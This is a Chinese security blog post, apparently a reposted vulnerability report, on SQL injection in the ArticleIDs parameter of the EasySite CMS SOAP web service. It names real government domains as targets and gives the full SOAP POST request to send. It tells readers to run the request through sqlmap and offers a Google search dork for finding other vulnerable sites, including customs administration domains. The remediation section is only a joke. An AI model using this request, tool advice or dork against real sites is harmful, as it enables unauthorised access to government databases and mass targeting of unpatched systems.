纵有疾风起
人生不言弃
首页 > 博客 > 黑客攻防 > 正文

easysite内容管理系统某简单粗暴的SQL注入 – 网站安

2020-10-11 分类:黑客攻防 阅读(1412) 评论(0) 扫描二维码 隐藏侧边

web services是不会骗人的~!

大量gov站点采用了easysite内容管理系统。

详细说明:

1.soap注入

easysite webservice 文件:

http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx

easysite内容管理系统某简单粗暴的SQL注入 – 网站安插图

2.ArticleIDs参数存在SQL注入漏洞

easysite内容管理系统某简单粗暴的SQL注入 – 网站安插图1

easysite内容管理系统某简单粗暴的SQL注入 – 网站安插图2

随便找个放sqlmap里跑吧

POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1
Host: dynamic.xmedu.gov.cn
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetArticleHitsArray"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetArticleHitsArray xmlns="http://tempuri.org/">
      <ArticleIDs>string</ArticleIDs>
    </GetArticleHitsArray>
  </soap:Body>
</soap:Envelope>

easysite内容管理系统某简单粗暴的SQL注入 – 网站安插图3

漏洞证明:

如果你不知道谁在用easysite,那就google(If you can open it)下把:

inurl:asmx DesktopModules

(海关总署N个域名都是这套系统)

修复方案:

GOV 网站,不求RANK,别跨省就行。

    上一篇: TRS WCM越权直接创建任意用户(无需审核) – 网站

    下一篇: TinyShop Sql Injection 1(无视GPC) – 网站安全 – 自学

AD:【更多看点】学生“冒死”偷拍老师,当看到最后一个,网友:这谁能顶得住

 收藏 (0)
未经允许不得转载:起风网 » easysite内容管理系统某简单粗暴的SQL注入 – 网站安
分享到: 生成海报
标签:

825e5b70b68d744d

相关推荐

评论 抢沙发

评论前必须登录!

立即登录